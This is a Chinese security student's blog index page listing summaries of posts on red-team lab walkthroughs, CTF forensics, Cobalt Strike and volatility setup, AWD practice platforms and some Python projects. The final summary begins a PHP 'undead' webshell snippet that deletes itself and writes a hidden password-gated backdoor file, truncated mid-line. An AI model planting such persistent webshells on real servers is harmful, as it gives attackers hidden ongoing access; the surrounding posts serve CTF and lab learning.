上一页 1 ··· 9 10 11 12 13 14 15 16 17 ··· 28 下一页
摘要: 关于部署:https://www.cnblogs.com/Cl0ud/p/13688649.html PS:好菜,后来发现内网主机还是PING不通VM1,索性三台主机全部配成NAT模式,按照WEB靶机(VM1)->内网渗透域成员主机(VM2)->拿下域管(VM3)的步骤进行渗透 访问VM1:http 阅读全文
posted @ 2020-10-05 14:43 春告鳥 阅读(3016) 评论(0) 推荐(0) 编辑
摘要: 起因是发现自己follow的大师傅个人主页跟普通的不太一样: 猜测应该是Github啥时候出现的新功能,查了一下,发现可以通过创建同名仓库来实现个人主页的美化设置 首先在 GitHub 上建立一个与自己 GitHub 账户同名的仓库,勾选 README。 同时可以看到有提示出现: You found 阅读全文
posted @ 2020-10-03 17:47 春告鳥 阅读(5733) 评论(0) 推荐(1) 编辑
摘要: 在某场比赛中师傅们说需要用到该工具,学习之 题目给了我们一个流量包,分析 发现 .hint.php.swp文件 该文件是使用 vim 编辑文件时异常退出而产生的,可以通过 vim -r 文件名 进行相应的恢复,但在这里我们直接跟踪流向下看 存在提示: You need to get two pass 阅读全文
posted @ 2020-10-02 17:00 春告鳥 阅读(1721) 评论(0) 推荐(0) 编辑
摘要: CobaltStrike3.14&3.8安装&中文乱码解决 工具简介 Cobalt Strike 一款以 Metasploit 为基础的 GUI 框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell 木马生成等。钓鱼攻击包括:站点克隆,目标信息获取, 阅读全文
posted @ 2020-09-22 01:57 春告鳥 阅读(4816) 评论(2) 推荐(0) 编辑
摘要: 简介 flask-migrate是flask的一个扩展模块,主要是扩展数据库表结构的. 官方文档:http://flask-migrate.readthedocs.io/en/latest/ 使用: 使用一共分为三步: 创建迁移环境->生成迁移脚本->更新数据库 本地数据库连接与相关配置文件 con 阅读全文
posted @ 2020-09-20 22:05 春告鳥 阅读(584) 评论(0) 推荐(0) 编辑
摘要: 靶场描述: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有 阅读全文
posted @ 2020-09-18 00:27 春告鳥 阅读(4538) 评论(1) 推荐(0) 编辑
摘要: 上了大三之后发现很多学校的通知都不会发送到班群里面,导致自己会错过很多重要信息,故想写一个爬虫来获取从当前时间之后的新的通知标题,并推送到微信上。 PS:推送到微信上这个想法来源是,很多时候都需要将消息以一种载体传送给我们,以前经常用的是邮件,但是随着聊天工具的普及,微信在国人的生活中占据了越来越重 阅读全文
posted @ 2020-09-17 01:33 春告鳥 阅读(717) 评论(0) 推荐(0) 编辑
摘要: 开学后实验室来了几个新同学,在线上CTF方面大家一直在持续学习,但AWD模式的CTF我们练习并不多,所以准备搭建一个AWD平台用于实验室成员的线下赛攻防练习。 最开始的是防灾科技大学的线下AWD靶场: https://github.com/glzjin/20190511_awd_docker 但是靶 阅读全文
posted @ 2020-09-13 20:14 春告鳥 阅读(3254) 评论(0) 推荐(1) 编辑
摘要: 工具下载: Linux环境 apt-get install volatility 各种依赖的安装,(视情况安装) #Distorm3:牛逼的反编译库 pip install distorm3 ​ #Yara:恶意软件分类工具 pip install yara ​ #PyCrypto:加密工具集 pi 阅读全文
posted @ 2020-09-10 21:47 春告鳥 阅读(1577) 评论(0) 推荐(0) 编辑
摘要: 一个简单的不死马如: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325 阅读全文
posted @ 2020-09-06 02:51 春告鳥 阅读(6384) 评论(3) 推荐(1) 编辑
上一页 1 ··· 9 10 11 12 13 14 15 16 17 ··· 28 下一页